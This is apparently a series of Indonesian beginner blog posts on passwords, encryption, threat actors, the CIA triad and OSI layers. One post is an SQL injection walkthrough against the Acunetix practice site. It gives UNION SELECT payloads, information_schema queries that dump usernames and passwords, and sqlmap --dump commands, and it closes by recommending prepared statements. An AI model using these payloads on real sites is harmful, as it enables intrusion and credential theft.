Halo Brow, bertemu lagi di artikel Saya, kali ini kita akan lanjut terkait materi Cybersecurity! Setelah kita belajar soal enkripsi di artikel sebelumnya, kali ini saya mau bahas sesuatu yang lebih dekat lagi dengan aktivitas kita sehari-hari, Bro. Apalagi kalau bukan soal Password atau kata sandi.

Password itu ibarat kunci rumah kita, Bro. Kalau ada orang lain yang memegang kunci rumah tersebut, mereka bisa bebas masuk, mengambil harta benda, atau bahkan membahayakan penghuninya. Nah, akun email, media sosial, hingga mobile banking Temen-temen itu dijaga oleh satu hal utama: Password. Kalau password-nya lemah, sama saja kita membiarkan pintu rumah terbuka lebar buat maling, Bro!


Apa Itu Teknik Brute Force?

Mungkin Temen-temen bertanya, memangnya gimana sih cara hacker membobol password? Salah satu teknik yang paling sering digunakan adalah Brute Force, Bro.

Brute force ini adalah teknik di mana hacker mencoba jutaan bahkan miliaran kombinasi password dalam hitungan detik menggunakan bantuan komputer. Kalau Temen-temen pakai password yang gampang ditebak, hacker nggak butuh waktu lama buat masuk ke akun Temen-temen, Bro.

Data Survei 2024: Untuk password dengan 4-6 karakter, hacker bisa menebusnya secara instan (kurang dari 1 detik). Bahkan untuk 8 karakter yang isinya hanya angka, hacker cuma butuh waktu sekitar 37 detik saja, Bro! Ngeri poll, kan?

Rahasia Password yang "Mustahil" Dibobol

Berdasarkan survei komputasi tahun 2024, semakin banyak kombinasi karakter yang kita masukkan, semakin pusing hacker menebaknya. Perhatikan tabel di bawah ini untuk melihat estimasi waktunya, Bro:


Nah, seperti yang Temen-temen lihat pada tabel di atas, perbedaannya sangat jauh jika kita menambah panjang karakter dan kombinasi simbol:

  • 8 Karakter (Kombinasi Lengkap): Butuh waktu sekitar 7 tahun untuk ditembus.
  • 11 Karakter (Kombinasi Huruf & Angka): Butuh waktu sekitar 618.000 tahun, Bro.
  • 13 Karakter (Kombinasi Lengkap): Butuh waktu 11 miliar tahun. Bisa dibilang impossible buat di-brute force, Bro.

Kesalahan Umum yang Sering Kita Lakukan

Coba cek, Bro, apa Temen-temen masih sering melakukan hal-hal di bawah ini?

  • Pakai Info Pribadi: Menggunakan nama sendiri, tanggal lahir, atau nama peliharaan. Ini gampang banget ditebak orang lain.
  • Satu Password buat Semua Akun: Kalau satu akun jebol, semua akun Temen-temen bakal kena efek domino.
  • Menulis di Catatan Terbuka: Menempel kertas password di monitor atau menulisnya di Notepad tanpa enkripsi itu bahaya bro.

Tips Membuat Password yang Super Kuat

Nah, sekarang saya mau kasih tahu cara bikin kunci(password) digital yang kokoh buat Temen-temen semua:

  1. Minimal 12 Karakter: Semakin panjang, semakin aman.
  2. Gunakan Kombinasi: Campur antara huruf besar, huruf kecil, angka, dan simbol (misal: @, #, $, !).
  3. Gunakan Frasa Unik: Jangan pakai kata yang umum. Gunakan kalimat acak yang nggak menggambarkan diri Temen-temen secara langsung.
  4. Pakai Password Manager: Biar nggak lupa, Bro, mending pakai aplikasi Password Manager. Jadi semua password disimpan secara aman dan terenkripsi.

Cara Cek, Apakah Password Temen-temen Pernah Bocor?

Terakhir, Bro, saya mau kasih rekomendasi website keren buat ngecek keamanan data kita. Namanya Have I Been Pwned.


Temen-temen bisa kunjungi haveibeenpwned.com lalu masukkan password yang biasa digunakan. Kalau hasilnya muncul warna merah, itu artinya password tersebut pernah bocor dalam kasus peretasan besar di internet. Kalau sudah merah, segera ganti dan jangan pernah pakai password itu lagi di mana pun, Bro!


Kesimpulan

Memiliki password yang panjang dan rumit sekarang ini harus sudah menjadi kewajiban Bro. Seiring komputer masa depan yang makin cepat, kita harus selangkah lebih maju dalam mengamankan data kita sendiri.

Semoga tips ini bermanfaat buat Temen-temen semua. Jangan lupa share ke orang terdekat supaya mereka juga aman ya Broww! Sekian dan terimakasih.
Sampai jumpa di artikel berikutnya.

Oke broww kali ini kita akan lanjut bahasan terkait Cybersecurity lagi, Setelah kita membahas tentang siapa saja "dalang" di balik serangan siber, sekarang kita akan masuk ke bahasan yang tidak kalah seru, Bro. Kita akan bahas gimana cara mengamankan data agar tidak bisa dibaca oleh orang yang tidak berhak, yaitu melalui Data Encryption.


Mungkin Temen-temen sering mendengar istilah enkripsi, dekripsi, hingga encoding. Semua ini berkaitan erat dengan Cybersecurity, khususnya dalam menjaga pilar Confidentiality (Kerahasiaan). Jadi, mari kita bahas satu per satu brooww!


Apa Itu Enkripsi dan Bedanya dengan Encoding?

Secara sederhana, Enkripsi adalah proses mengubah data asli (plain text) yang bisa kita baca, menjadi kode-kode rahasia (cipher text) yang tidak masuk akal bagi manusia. Tujuannya jelas, Bro: supaya data rahasia tersebut tidak bisa diintip oleh orang lain yang tidak punya "kunci"-nya.

Lalu, apa bedanya dengan Encoding? Nah, kalau encoding itu sebenarnya hanya mengubah format data supaya bisa dimengerti oleh suatu sistem tertentu saja, Bro. Tujuannya bukan untuk keamanan, melainkan untuk kesesuaian format data agar bisa diproses sistem.

Analogi Sederhana: Bayangkan Temen-temen mengirim surat rahasia zaman dulu menggunakan sandi rumit yang hanya bisa dibaca kalau punya kamus sandinya. Tanpa kamus itu, surat tersebut hanya terlihat seperti kumpulan huruf acak aja, Bro.

 

Enkripsi di Kehidupan Sehari-hari

Tanpa kita sadari, sebenarnya kita sudah sering menggunakan teknologi enkripsi ini lho, Bro. Contohnya:

  • WhatsApp: Menggunakan End-to-End Encryption, jadi hanya pengirim dan penerima saja yang bisa baca pesannya.
  • Website HTTPS: Kalau Temen-temen melihat ikon gembok di URL bar, itu artinya koneksi kita aman dan terenkripsi. Kalau cuma HTTP (tanpa S), orang lain dalam satu jaringan bisa menyadap komunikasi kita, Bro.
  • Cryptocurrency: Teknologi Blockchain seperti Bitcoin menggunakan enkripsi untuk memvalidasi transaksi.
  • Password Manager: Semua password disimpan dalam bentuk kode acak, jadi nggak bisa dibaca orang lain meski mereka berhasil masuk ke sistemnya.

Tipe-Tipe Enkripsi

Dalam dunia digital, enkripsi secara umum dibagi menjadi dua tipe utama, Bro. Temen-temen perlu tahu bedanya:

1. Enkripsi Simetris (Symmetric Encryption)

Tipe ini menggunakan satu kunci yang sama untuk proses mengunci (enkripsi) dan membuka (dekripsi) data. Prosesnya sangat cepat, tapi kita harus ekstra hati-hati menjaga kuncinya agar tidak jatuh ke tangan yang salah, Bro.


2. Enkripsi Asimetris (Asymmetric Encryption)

Tipe ini lebih canggih karena menggunakan dua kunci yang berbeda: Public Key untuk mengunci data, dan Private Key untuk membukanya. Meski prosesnya sedikit lebih lama dibanding simetris, tipe ini jauh lebih aman buat pengiriman data di internet, Bro.


Simulasi Proses Enkripsi dan Dekripsi

Biar Temen-temen ada gambaran, saya akan coba ilustrasikan proses ini menggunakan bantuan tools seperti CyberChef atau Cybersave, dan bisa di tonton video berikut Bro.


Contoh Simetris: Vigenere Cipher

Misalkan kita punya pesan: "belajar cybersecurity sangat seru".

Kita buat kuncinya: "bulan". Saat diproses, pesannya berubah jadi kalimat acak. Nah, untuk mengembalikannya, kita wajib pakai kunci yang sama persis yaitu "bulan". Kalau kuncinya beda, datanya tetap jadi sampah yang nggak bisa dibaca, Bro.


Contoh Asimetris: RSA

Dalam metode RSA, kita harus membuat sepasang kunci (Key Pair). Pas saya masukkan kalimat yang sama dan mengenkripsinya dengan Public Key, hasilnya jadi acak banget. Untuk membukanya kembali, saya wajib pakai Private Key pasangannya. Inilah rahasia kenapa transaksi kita di internet tetap aman, Bro!


Kesimpulan:

Intinya, Bro, enkripsi adalah pilar utama kalau kita bicara soal privasi data. Memilih antara tipe simetris atau asimetris sangat bergantung pada apa yang Temen-temen prioritaskan, apakah kecepatan atau keamanan tingkat tinggi.

Semoga pembahasan kali ini bermanfaat buat Temen-temen semua ya, sekian dan terimakasih🙏

Mengenal Ancaman Umum di Dunia Siber dan Siapa di Baliknya

Setelah pada artikel sebelumnya kita telah membahas pondasi dasar Cybersecurity dan CIA Triad, sekarang muncul sebuah pertanyaan: Sebenarnya, apa saja yang mengancam kita di internet? Dan siapakah individu atau kelompok yang memiliki niat untuk menyerang sistem tersebut?

Ancaman Umum di Dunia Siber

Serangan siber memiliki banyak bentuk. Berikut adalah tiga jenis ancaman yang paling sering kita temui dalam aktivitas digital sehari-hari:

1. Phishing (Penipuan Digital)

Phishing adalah teknik penipuan yang bertujuan untuk mencuri data pribadi Temen-temen, seperti kata sandi (password) atau data kartu kredit. Biasanya, penyerang mengirimkan email, SMS, atau tautan palsu yang menyamar sebagai situs resmi, misalnya institusi perbankan atau media sosial.

  • Ciri-ciri: Adanya kesan darurat (misalnya: "Akun Teman-temen terblokir!"), alamat email pengirim yang mencurigakan, serta tautan yang mengarah ke domain yang tidak dikenal.
  • Solusinya: Jangan terburu-buru mengeklik tautan. Selalu periksa alamat situs secara teliti dan lakukan verifikasi langsung ke sumber resminya jika Temen-temen merasa ragu.

Simulasi Nyata: Agar Temen-temen tidak penasaran mengenai bagaimana cara peretas (hacker) "memancing" korbannya, saya pernah membuat simulasi praktisnya dalam salah satu webinar saya. Di sana, saya mempraktikkan langsung bagaimana sebuah tautan palsu dapat mencuri data tanpa disadari. 

Tonton simulasinya di sini: Webinar Introduction to Cybersecurity - Phishing Lab

2. Malware (Malicious Software)

Sesuai namanya, ini adalah program jahat yang disisipkan ke perangkat Temen-temen tanpa izin. Malware memiliki banyak jenis, mulai dari Virus yang merusak berkas, Trojan yang menyamar sebagai aplikasi bermanfaat, hingga Spyware yang berfungsi untuk memantau aktivitas Temen-temen secara diam-diam.

  • Cara Mencegah: Pastikan Temen-temen hanya menginstal aplikasi dari sumber resmi (seperti Play Store atau App Store), selalu gunakan perangkat lunak antivirus yang diperbarui, dan hindari mengunduh berkas dari situs yang tidak terpercaya.

3. Ransomware (Penyanderaan Data)

Ini adalah jenis malware yang sangat diwaspadai. Ransomware akan mengunci seluruh berkas di komputer Temen-temen dan penyerang akan meminta uang tebusan (ransom) jika Temen-temen ingin berkas tersebut dapat diakses kembali.

Kasus Nyata:  WannaCry pada tahun 2017 yaitu serangan yang melumpuhkan ratusan ribu komputer di seluruh dunia, termasuk fasilitas kesehatan dan instansi pemerintah.

Cara Mencegah: Rutinlah melakukan pencadangan (backup) data di tempat yang berbeda, rajin memperbarui sistem operasi, dan jangan pernah membuka lampiran email dari pengirim yang tidak dikenal.

Threat Actor: Siapa Pelaku Serangan Siber?

Nah Temen-temen kan pasti kepo yah, siapa sih orang dibalik ini semua gitu. Jadi ada beberapa orang yang menjadi dalang dibaliknya bro, yaitu pertama ada yang namanya Hacker, nah pasti Temen-temen ngga asing kan dengar kata Hacker. Tapi tunggu dulu, tidak semuanya Hacker itu jahat ya... ada juga  yang baik juga lohh..., nah ini saya akan berikan kelompok/klasifikasinya berdasarkan etikanya juga.

Klasifikasi Hacker Berdasarkan "Topi"

  • White Hat Hacker: Sering disebut sebagai "Hacker Baik". Mereka meretas sistem dengan izin pemiliknya untuk menemukan celah keamanan dan memperbaikinya.
  • Black Hat Hacker: Inilah penjahat siber yang sebenarnya. Mereka meretas dengan niat jahat untuk mencuri data, merusak sistem, atau mencari keuntungan pribadi secara ilegal.
  • Grey Hat Hacker: Berada di tengah-tengah. Mereka mungkin meretas tanpa izin, tapi tidak bermaksud jahat. Biasanya mereka akan melaporkan celah yang ditemukan kepada pemilik sistem dan terkadang mengharapkan imbalan.

Advanced Persistent Threat (APT)

APT adalah sekelompok peretas yang memiliki keahlian tinggi dan menggunakan teknologi canggih untuk meretas sistem secara berkelanjutan dan tersembunyi. Mereka tidak hanya menyerang sekali, namun dapat bertahan lama di dalam jaringan target untuk mencuri data secara bertahap.

Kelompok Peretas Terkenal

Terdapat beberapa kelompok peretas atau ransomware group yang reputasinya sangat diwaspadai di dunia internasional, contohnya antara lain:

  • REvil
  • Conti
  • Lockbit

State-Sponsored Threat Actor

Ini adalah kelompok peretas yang didukung langsung atau didanai oleh suatu negara untuk kepentingan intelijen atau spionase. Beberapa contoh yang sering muncul dalam laporan keamanan dunia adalah:

  • APT 29: Sering dikaitkan dengan Rusia.
  • APT 38: Sering dikaitkan dengan Korea Utara, terutama untuk motif finansial.

Kesimpulan

Intinya, memahami siapa lawan kita dan metode apa yang mereka gunakan adalah langkah awal yang sangat penting agar kita tidak mudah menjadi korban. Dunia digital memang sangat luas dan penuh risiko, namun selama Temen-temen tetap waspada dan mau terus belajar, saya yakin kita bisa tetap beraktivitas dengan aman.

Oke, mungkin cukup segitu dulu, semoga bermanfaat dan bisa lebih menyadari untuk berhati-hati terhadap potensi ancaman di dunia digital bro! Stay safee!


Halo semua, kembali lagi dengan Saya Adelwin! Setelah kita bahas teknis SQL Injection, kali ini mau mundur selangkah buat bahas "Big Picture" nya: Apa sih sebenarnya Cybersecurity itu? Kenapa kita baik individu maupun organisasi harus peduli?

1. Apa Itu Cybersecurity?

Gampangnya, Cybersecurity adalah cara kita melindungi data, sistem, dan jaringan dari serangan digital.

Bayangin dunia digital itu kayak rumah. Rumah butuh pintu, pagar, kunci, bahkan satpam buat ngelindungin dari maling. Di dunia digital pun sama. Tujuannya supaya data kita nggak bocor, sistem nggak diretas, dan aktivitas online kita tetep aman terkendali.

2. Konteks Organisasi: Skala yang Lebih Besar

Kalau buat individu mungkin cuma soal amankan akun medsos, tapi buat organisasi atau perusahaan, skalanya jauh lebih besar. Organisasi butuh keamanan digital buat ngelindungin:

  • Data Pelanggan & Karyawan: Privasi itu mahal harganya!
  • Sistem Infrastruktur: Jangan sampai operasional mati total gara-gara serangan siber.
  • Reputasi: Sekali data bocor, kepercayaan pelanggan bisa hilang selamanya.

3. Pilar Utama: CIA Triad

Dalam Cybersecurity, ada konsep "suci" yang namanya CIA Triad. Ini adalah tiga pilar utama yang harus dijaga :

CONFIDENTIALITY (Kerahasiaan)

Memastikan data rahasia cuma bisa diakses oleh orang yang berhak. Jangan sampai informasi sensitif jatuh ke tangan yang salah.

INTEGRITY (Integritas)

Memastikan data tetap akurat dan konsisten. Nggak ada pihak luar yang mengubah atau memanipulasi data di tengah jalan.

AVAILABILITY (Ketersediaan)

Memastikan data atau layanan selalu siap diakses kapan pun dibutuhkan, baik oleh tim internal maupun publik.

4. Sejarah: Evolusi Ancaman Siber

Cybersecurity nggak muncul tiba-tiba. Dia berevolusi seiring dengan perkembangan teknologi internet:

  • 1960-an: Awal internet (ARPANET) diciptakan murni dibuat untuk komunikasi.
  • 1980-an: Semua orang dianggap “trusted” sampai muncul virus seperti Brain dan Morris Worm.
  • 1990-an: Internet makin luas (WWW muncul). Serangan mulai berkembang: hacker, malware, phishing.
  • 2025 - Sekarang: Serangan semakin canggih seperti Ransomware, serangan berbasis AI, dan Advanced Persistent Threat (APT).

5. Regulasi dan Dampaknya bagi Kita

Sekarang, keamanan data bukan cuma soal teknis, tapi soal hukum. Di Indonesia kita punya UU Pelindungan Data Pribadi (UU PDP) untuk melindungi hak privasi warga negara.

Dampaknya bagi kita apa?

  • Individu: Kelalaian bisa berujung pada pencurian identitas, akun medsos dibobol, hingga kerugian finansial.
  • Organisasi: Kebocoran data bisa bikin operasional lumpuh, kena denda hukum yang besar, dan kehilangan kepercayaan pasar.

Kesimpulan

Belajar Cybersecurity bukan cuma buat jadi hacker, tapi supaya kita bisa bertahan di tengah maraknya kejahatan di dunia digital saat ini. Stay safe, stay secure broww!

BELAJAR SQL INJECTION: DARI MANUAL HINGGA OTOMATIS (LAB: TESTPHP.VULNWEB.COM)

Halo semua! Setelah sekian lama nggak update, kali ini saya mau berbagi catatan belajar tentang salah satu celah keamanan paling legendaris: SQL Injection (SQLi). 


Kita akan menggunakan lab latihan dari Acunetix yaitu: http://testphp.vulnweb.com.
Ingat, tutorial ini hanya untuk tujuan edukasi dan pentesting legal ya!

1. MENCARI PINTU MASUK (RECONNAISSANCE)

Langkah pertama adalah mencari URL yang berkomunikasi langsung dengan database. Biasanya ditandai dengan adanya parameter ID di akhir URL.
Contoh:

- http://testphp.vulnweb.com/listproducts.php?cat=1
- http://testphp.vulnweb.com/product.php?pic=1

Kenapa? Karena parameter ini biasanya digunakan oleh backend untuk mengambil data dari tabel database. Website statis (seperti .html) biasanya lebih aman dari serangan jenis ini.

2. TESTING: MEMATAHKAN STRUKTUR QUERY


Setelah nemu target, kita coba tambahkan tanda petik tunggal (') di akhir ID untuk memicu error (syntax break).

Contoh: listproducts.php?cat=1'

Kenapa tanda petik? Karena dalam database, tanda petik harus berpasangan (pembuka dan penutup). Kalau kita tambahin satu di akhir, strukturnya jadi ganjil dan SQL-nya akan error.
Yang dicari: Pesan error yang spesifik. Kalau error-nya muncul, berarti pintunya "terbuka" (Vulnerable). Kalau halamannya cuma blank, itu namanya Blind SQL Injection (materi tingkat lanjut).


3. MENCARI JUMLAH KOLOM (ORDER BY)

Setelah tahu pintunya terbuka, kita perlu tahu ada berapa "kamar" (kolom) di dalam database tersebut menggunakan perintah ORDER BY.

Contoh: product.php?cat=1 ORDER BY 10-- -



Cara menentukannya:

- Coba angka 10, kalau halaman normal, berarti kolom ada 10 atau lebih.
- Coba angka 12, kalau halaman error/blank, berarti kolom kurang dari 12.
- Jika di angka 12 error dan di angka 11 normal, maka jumlah kolom fix adalah 11.



4. MENCARI "NOMOR AJAIB" (VULNERABLE COLUMN)

Kita perlu tahu kolom nomor berapa yang hasilnya muncul di halaman website menggunakan perintah UNION SELECT.

Contoh (jika kolom ada 11):

product.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,11-- -

Trik Penting: Ubah ID menjadi negatif (cat=-1). Ini dilakukan supaya query asli server kosong, sehingga database dipaksa menampilkan hasil dari query UNION kita. Lihat angka yang muncul di layar (misal angka 7 dan 11). Itulah "nomor ajaib" kita.


5. EKSPLOITASI: DUMPING DATA (DIOS - DUMP IN ONE SHOT)

Gunakan nomor ajaib tadi untuk menyuntikkan perintah (query) untuk mengintip isi database.


- Mencari Nama Tabel:
(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database())


- Mencari Nama Kolom (Misal pada tabel 'users'):
(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name='users')


- Mengambil Data (Username & Password):
(SELECT group_concat(uname,0x3a,pass) FROM users)



Setelah ketemu username dan password-nya, tinggal cari halaman login admin dan boom! Kita bisa masuk ke sistem.

   disini saya sudah menemukan halaman loginnya yaitu http://testphp.vulnweb.com/login.php, dan saya langsung masukkin username test dan password test tadi yang sudah ditemukan.


dan boom, kita sudah bisa masuk ke systemnya dengan kredensial tadi, dan disini di cek masuk sebagai user bernama relax😂.


6. PENGGUNAAN TOOLS SQLMAP (OTOMATIS)



Nah, setelah kita bahas cara manual yang lumayan ribet, sebenarnya ada cara yang jauh lebih praktis. Yup, ada versi otomatisnya juga buat eksploitasi SQLi, yaitu menggunakan tools sakti bernama SQLmap.


Tool ini biasanya sudah bawaan kalau lo pakai Kali Linux. Buat yang belum punya, bisa install dulu lewat terminal:

sudo apt-get install sqlmap -y

Kalau masih bingung perintahnya apa saja, tinggal panggil bantuan:
sqlmap -h

- Melihat Database:

sqlmap -u "http://testphp.vulnweb.com/product.php?pic=2" --dbs

- Melihat Tabel dalam Database (Misal DB: acuart):
sqlmap -u "http://testphp.vulnweb.com/product.php?pic=2" -D acuart --tables

- Melihat Kolom dalam Tabel (Misal Tabel: users):
sqlmap -u "http://testphp.vulnweb.com/product.php?pic=2" -D acuart -T users --columns

- Dump Data Username dan Password:

sqlmap -u "http://testphp.vulnweb.com/product.php?pic=2" -D acuart -T users -C "uname,pass" --dump

KESIMPULAN

SQL Injection terjadi karena input dari user tidak difilter dengan baik. Cara terbaik mencegahnya adalah dengan menggunakan Prepared Statements (Parameterized Queries) agar input user tidak dianggap sebagai perintah SQL.


Stay safe dan gunakan ilmu ini dengan bijak!


Assalamualaikum Wr, Wb.

Oke kembali lagi dengan Saya Adelwin. Pada kesempatan ini saya ingin membagikan perihal apa itu Encaptulation & Descaptulation Layer.


Sebelum menerangkan Encaptulation & Descaptulation, kita harus tau terlebih dahulu bahwasannya pada TCP/IP ataupun pada OSI Layer itu ada proses Enscaptulation & Descaptulation, yang mana hal tersebut bisa di analogikan dengan membungkus dan membuka sebuah paket.


Ketika data dikirim, proses Encapsulation terjadi — yaitu data dari aplikasi dibungkus lapis demi lapis sesuai dengan urutan layer OSI atau TCP/IP.
Sebaliknya, ketika data diterima, terjadi proses Decapsulation, di mana data tersebut dibuka lapis demi lapis sampai akhirnya bisa dipahami oleh aplikasi penerima.


ENSCAPTULATION

Nah, setelah kita paham gambaran besarnya, sekarang kita masuk ke bagaimana proses Encapsulation itu terjadi di dalam OSI Layer.
Jadi, pada saat data dikirim oleh sebuah perangkat, data tersebut akan melewati setiap layer dari atas ke bawah, mulai dari Application Layer sampai ke Physical Layer.
Yang perlu diketahui juga, bahwa setiap layer memiliki PDU (Protocol Data Unit) masing-masing.
PDU ini adalah nama dari data pada setiap lapisan. Jadi bentuk datanya sama-sama “data”, tapi namanya berubah sesuai lapisannya.

Selain itu, pada proses Encapsulation, setiap layer akan menambahkan header(kepala paket) dan bahkan ada yang menambahkan trailer(ekor paket) juga sebelum data dikirim ke layer berikutnya.
Header inilah yang berisi informasi penting agar data bisa dikirim dengan benar dan sampai ke tujuan.

Secara alurnya kurang lebih seperti ini:

  • Application, Presentation, dan Session Layer
    Data masih berupa Data biasa karena ketiga layer ini tidak mengubah bentuknya.
    Data dari aplikasi (misalnya HTTP request) turun ke bawah untuk diproses lebih lanjut.

  • Transport Layer
    Di sini data dibungkus menjadi Segment (kalau pakai TCP) atau Datagram (kalau pakai UDP).
    Layer ini menambahkan header yang berisi port sumber, port tujuan, serta kontrol lainnya.

  • Network Layer
    Data kemudian dibungkus lagi menjadi Packet.
    Di layer ini ditambahkan header berisi IP Address sumber dan tujuan, sehingga paket tahu ke mana harus pergi.

  • Data Link Layer
    Packet akan dibungkus menjadi Frame.
    Data Link menambahkan header (dan juga trailer) berisi MAC Address sumber dan tujuan.

  • Physical Layer
    Layer terakhir ini mengubah frame menjadi bit (0 dan 1) dan mengirimkannya melalui kabel atau media fisik lainnya.

Nah, dari atas sampai bawah itulah yang disebut proses Encapsulation: data dibungkus, ditambah header, lalu dikirim ke perangkat tujuan.

DECAPTULATION

Nahh kalau tadi kita sudah membahas bagaimana data itu dibungkus(Encaptulation) lapis demi lapis pada sisi pengirim, maka proses berikutnya adalah membuka bungkusannya kembali pada sisi penerima yaitu dinamakan Decapsulation.

Pada decapsulation ini, data yang datang dari jaringan akan melewati layer OSI dari bawah ke atas, dimulai dari Physical Layer sampai kembali ke Application Layer.
Setiap layer akan membaca, memeriksa, lalu melepas header (atau trailer) yang sebelumnya ditambahkan saat proses encapsulation.


Secara alur, prosesnya seperti ini:

  • Physical Layer
    Data diterima dalam bentuk bit (0 dan 1). Layer ini hanya bertugas menangkap sinyal dari media fisik dan meneruskannya ke layer di atas.

  • Data Link Layer
    Bit-bit tersebut disusun kembali menjadi sebuah Frame.
    Pada tahap ini, Data Link Layer akan memeriksa trailer (seperti FCS) untuk mendeteksi error, lalu membuang header dan trailer miliknya sebelum diteruskan ke layer berikutnya.

  • Network Layer
    Setelah header Data Link dilepas, data akan muncul kembali sebagai Packet.
    Network Layer memeriksa alamat IP tujuan untuk memastikan paket tersebut benar-benar ditujukan ke perangkat ini. Setelah itu, header IP dilepas dan datanya diteruskan ke Transport Layer.

  • Transport Layer
    Di layer ini packet diubah kembali menjadi Segment.
    Transport Layer memeriksa informasi seperti port tujuan, urutan segmen, serta manajemen koneksi (kalau TCP). Setelah semua valid, header Transport dilepas dan datanya diteruskan ke atas.

  • Session Layer
    Segmen yang sudah bersih masuk ke Session Layer yang mengatur sesi atau komunikasi antar aplikasi.
    Layer ini memastikan bahwa sesi komunikasi tetap sinkron dan berkelanjutan sebelum diteruskan ke layer selanjutnya.

  • Presentation Layer
    Data yang masuk akan dikonversi atau didekode (decode) sesuai format aslinya, misalnya dekripsi atau dekompresi jika diperlukan.
    Setelah itu datanya siap diberikan ke Application Layer.

  • Application Layer
    Inilah tahap akhir, di mana data yang sudah bersih sepenuhnya ditampilkan kepada aplikasi pengguna.
    Misalnya halaman web muncul di browser, pesan chat muncul di layar, atau file yang kamu unduh akhirnya tersimpan.

Jadi, Decapsulation ini adalah proses membuka bungkusan paket data kembali ke bentuk aslinya, dimulai dari Physical Layer hingga akhirnya bisa diproses oleh aplikasi.

Nahh, dengan memahami Encapsulation dan Decapsulation, kita jadi bisa melihat bagaimana data itu benar-benar “berjalan” dan “diproses” pada setiap lapisan OSI mulai dari dikemas, dikirim, diterima, sampai akhirnya ditampilkan kembali ke pengguna.


Kalau secara gambar kurang lebih seperti ini alurnya :


Oke mungkin itu saja yang dapat saya berikan/sampaikan. Nantikan artikel artikel saya berikutnya seputar IT terutama di bidang Networking.... Sekian Terimakasih, Wassalamualaikum Wr, Wb.

 Assalamualaikum Wr, Wb...

Halo teman-teman! Bertemu lagi dengan saya, Adelwin. Wauu, sudah lama banget ya saya nggak update artikel di blog ini, hehehe.
InsyaAllah kedepannya saya akan kembali aktif berbagi tulisan di sini. Tujuannya saya ingin mempresentasikan ilmu yang sedang saya pelajari, sebagai bukti apakah saya benar-benar sudah paham atau belum, mwehehe 😄

Jadi, kalau teman-teman punya saran, kritik, atau mungkin masih ada yang bingung dengan pembahasan saya, boleh banget tulis di kolom komentar ya! Biar saya juga bisa terus evaluasi dan belajar bareng kalian.



Oke baik langsung saja ke pembahasannya yaitu mulai dari OSI Layer...

OSI LAYER

Osi Layer(Open System Interconnection) sendiri adalah sebuah networking model untuk komunikasi antar perangkat, dan networking model tersebut(OSI layer) dijadikan sebuah  untuk standarisasi berkomunikasi antar vendor(seperti Cisco, Mikrotik, Huwawei, dll).

Kita perlu melihat sejarah. Dulu, setiap vendor jaringan punya "bahasanya" sendiri—seperti IBM dengan System Network Architecture (SNA). Akibatnya, perangkat dari vendor A sulit, bahkan mustahil, berbicara dengan perangkat dari vendor B.


dengan adanya OSI Layer inilah yang hadir sebagai "penerjemah" dan dijadikan standarisasi di semua vendor untuk bisa saling berkomunikasi.

Oke, setelah kita tahu peran besarnya sebagai standarisasi, mari kita bedah inti dari model ini. OSI Layer terdiri dari tujuh lapisan (layer) yang punya tugas spesifik dan berurutan. Untuk mempermudah pemahaman, ketujuh layer ini sering dibagi menjadi dua kelompok besar: Layer Atas (Application Set) dan Layer Bawah (Data Transport Set).

Layer atas :

  • Application Layer (Lapisan 7)
  • Presentation Layer (Lapisan 6)
  • Session Layer (Lapisan 5)'
Layer Bawah :
  • Transport Layer (Lapisan 4)
  • Network Layer (Lapisan 3)
  • Data Link Layer (Lapisan 2)
  • Physical Layer (Lapisan 1)

Oke kita mulai dari lapisan yang paling atas yaitu Application Layer.

1. Application Layer

Application Layer adalah lapisan yang paling dekat dengan pengguna. Tugas utamanya adalah menjembatani interaksi antara aplikasi (software) dengan jaringan. Lapisan ini menyediakan layanan agar aplikasi dapat mengakses sumber daya jaringan.

Contohnya ketika kita mengakses sebuah web server (website seperti facebook, instagram, dll), kita berinteraksi dengan Application Layer. Protokol seperti HTTP atau HTTPS digunakan untuk mengirim permintaan (request) dari client (browser Anda) dan menerima respons dari server, sehingga halaman web bisa ditampilkan.

Protokol yang digunakan di Application Layer antara lain HTTP, HTTPS, FTP, SMTP, dan lain-lain.


2. Presentation Layer

Presentation Layer bisa dibilang sebagai penerjemah data antar sistem.
Tugas utamanya adalah memastikan data yang dikirim oleh Application Layer di satu perangkat dapat dipahami dan diproses oleh Application Layer di perangkat tujuan.

Lapisan ini juga bertanggung jawab atas enkripsi, dekripsi, kompresi, dan format data agar bisa ditampilkan dengan benar.
Contohnya seperti file atau format data JPG, PNG, HTML, MP4, dan JSON.


3. Session Layer

Session Layer bertugas untuk membangun, memelihara, dan mengakhiri sesi komunikasi antara dua perangkat.
Lapisan ini mengatur kapan koneksi dimulai, berapa lama berlangsung, serta bagaimana koneksi diakhiri dengan aman.

Contohnya, ketika kamu sedang melakukan panggilan video atau login ke sebuah server, Session Layer memastikan sesi komunikasi tetap aktif dan stabil selama proses berlangsung.


4. Transport Layer

Transport Layer berfungsi untuk mengatur jalannya data dari pengirim ke penerima agar sampai dengan benar dan berurutan.
Lapisan ini juga menentukan apakah komunikasi akan dilakukan secara connection-oriented (dengan koneksi tetap) atau connectionless (tanpa koneksi tetap).

Protokol yang paling dikenal di lapisan ini adalah TCP (Transmission Control Protocol) dan UDP (User Datagram Protocol).

  • TCP menjamin data dikirim dengan urutan yang benar dan tanpa kehilangan (contohnya saat mengakses web, email, atau FTP).

  • UDP lebih cepat tapi tidak menjamin keutuhan data (contohnya pada video streaming atau game online).

Intinya, Transport Layer bertugas memastikan data yang dikirim sampai ke tujuan dengan cara yang sesuai dengan kebutuhan aplikasinya.


5. Network Layer

Network Layer bertanggung jawab untuk mengatur alamat dan jalur pengiriman data antar jaringan.
Di sinilah konsep IP address (alamat logis) bekerja. Lapisan ini juga menentukan rute terbaik (routing) agar paket data bisa sampai ke tujuan dengan efisien.

Contohnya, ketika kamu mengirim pesan dari komputer di Tangerang ke server di Jakarta, Network Layer menentukan jalur mana yang akan dilewati paket tersebut.

Protokol yang umum di lapisan ini antara lain:
IP (IPv4/IPv6), ICMP, ARP, dan OSPF.


6. Data Link Layer

Data Link Layer bekerja untuk mengirimkan data dari satu perangkat ke perangkat lain dalam satu jaringan lokal (LAN).
Lapisan ini memastikan bahwa data bebas dari kesalahan saat dikirim melalui media fisik seperti kabel atau Wi-Fi.

Di layer ini juga terdapat alamat fisik yang disebut MAC Address, dan proses framing (pembungkusan data) dilakukan di sini.

Contoh protokol yang digunakan di lapisan ini antara lain:
Ethernet, PPP, dan Frame Relay.


7. Physical Layer

Physical Layer adalah lapisan paling bawah dari model OSI.
